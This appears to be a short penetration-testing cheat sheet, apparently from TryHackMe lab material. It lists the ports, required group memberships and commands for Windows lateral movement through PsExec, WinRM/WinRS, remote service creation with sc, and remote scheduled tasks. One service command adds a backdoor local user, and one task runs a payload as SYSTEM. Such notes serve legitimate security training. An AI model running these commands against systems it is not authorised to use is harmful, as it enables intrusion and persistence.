Remote process

1. Psexec

• Ports: 445/TCP (SMB)

• Required Group Memberships: Administrators (on the remote target)

• Command:

  psexec64.exe \\MACHINE_IP -u Administrator -p <PASSWORD> -i cmd.exe

---

2. Remote Process Creation Using WinRM

• Ports:

  • 5985/TCP (WinRM HTTP)

  • 5986/TCP (WinRM HTTPS)

• Required Group Memberships: Remote Management Users

Commands

• Interactive session:

  $username = 'Administrator';
  $password = '<PASSWORD>';
  $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; 
  $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
  
  # Start an interactive session
  Enter-PSSession -ComputerName TARGET -Credential $credential

• Execute a single command:

  Invoke-Command -ComputerName TARGET -Credential $credential -ScriptBlock { whoami }

• WinRS Command:

  winrs.exe -u:Administrator -p:<PASSWORD> -r:TARGET cmd

---

3. Remotely Creating Services Using sc

• Ports:

  • 135/TCP, 49152-65535/TCP (DCE/RPC)

  • 445/TCP, 139/TCP (RPC over SMB Named Pipes)

• Required Group Memberships: Administrators

Commands

• Create a service:

  sc.exe \\TARGET create <SERVICE> binPath= "net user munra Pass123 /add" start= auto

• Start the service:

  sc.exe \\TARGET start <SERVICE>

• Stop the service:

  sc.exe \\TARGET stop <SERVICE>

• Delete the service:

  sc.exe \\TARGET delete <SERVICE>

---

4. Creating Scheduled Tasks Remotely

• Command to Create a Task:

  schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00

• Command to Run a Task:

  schtasks /s TARGET /run /TN "THMtask1"

• Command to Delete a Task:

  schtasks /S TARGET /TN "THMtask1" /DELETE /F